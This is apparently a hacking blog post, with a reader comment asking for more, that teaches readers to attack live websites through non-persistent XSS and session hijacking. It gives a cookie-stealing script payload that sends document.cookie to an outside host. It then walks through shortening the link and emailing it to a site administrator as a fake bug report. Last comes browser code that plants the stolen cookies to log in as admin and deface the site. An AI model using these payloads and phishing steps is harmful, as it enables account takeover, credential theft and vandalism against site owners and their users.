Non-Persistent XSS:
In this method we will force our victim to go to our link,initial steps are almost similar to previous method.- First of all we will search for a XSS vulnerable site.
- After finding the site check for its search box , it must be like this search.php and now you have to check whether this search.php is vulnerable or not.
- To check this add this simple code in the search box and click the search button.
Code:
<script>alert(document.cookie)</script>
- After searching this code if a box popup it means this search.php is vulnerable to Non-Persistent XSS attack.
- Now after confirming the vulnerability add the below code in the url of this search.php page.
Code:
"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
- Now we have to shrink the link of whole page for this use tinyurl or any other such service.
- Now try to find a site administrator's E-mail,for this you may use whois lookup table or any online service which gives you the detail of the site's owner
- After getting the email id send him a fake email from any online fake mailer or through your fake id.
- In the body of the email just tell something fake like: Hey i found a huge bug in your website! and give him the shrinked link of the search.php in which you have also added the code.
- Tinyurl will mask the link and don't let it to go to spam
- Once he clicked on that link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher.
- No matter what he does and changes his password you can still login as him.
NOTE : Among these two types of XSS , Persistent is used most commonly and is the best way to get cookies.
Session Hijack
Until now we have discussed that how to get cookies of someone using XSS and now we will check how to use these cookies to enter into the victim's account .This is called Session Hijack.- Ok now we have got the admin's cookies using both methods, so we need to edit our own browser's cookies.
- First of all go to that site's admin login or its main page whose cookies you have.
- Now delete ALL of your cookies from that page.For this check the topic on cookies.
- Now go in your cookies.html page which you have made on a free hosting site and copy everything in front of the Cookie: in a notepad.These are the cookies.
- This sign ; separates cookies from each other so first copy the code before the ;i.e the first cookie.
- Now come back to that vulnerable site and instead of link add the following code but don't hit enter:
Code:
Javascript:void(document.cookie="ADD YOUR COOKIE HERE")
- Add that cookie in between " " and now hit enter.
- Do this with all of the cookies and refresh the page.
- And hurrah!!! you are logged in as administrator.
- So now go in your admin panel and upload your deface page,now you can do anything to that site.
About the Author
I am XEO Hacker, the founder of Hack With Style (HWS). I am blogging since 2009 before that I just search things and now I am sharing my knowledge through this plateform.I'm also a freelance writer on topics related to Website Hacking,Website Optimization (SEO), blogger customizations and making money online.
| Follow @xeohacker |
 In 61 people's circles
|
 |
 |
 |
 |
Subscribe To Get FREE Tutorials!
|
Respected Readers:
|
1 comments:
please step by step define for attack website
please send sumit.dadhich1988@gmail.com
Your feedback is always appreciated. I will try to reply to your queries as soon as time allows.
Post a CommentNote:-
Please do not spam Spam comments will be deleted immediately upon my review.
Regards,
XEO Hacker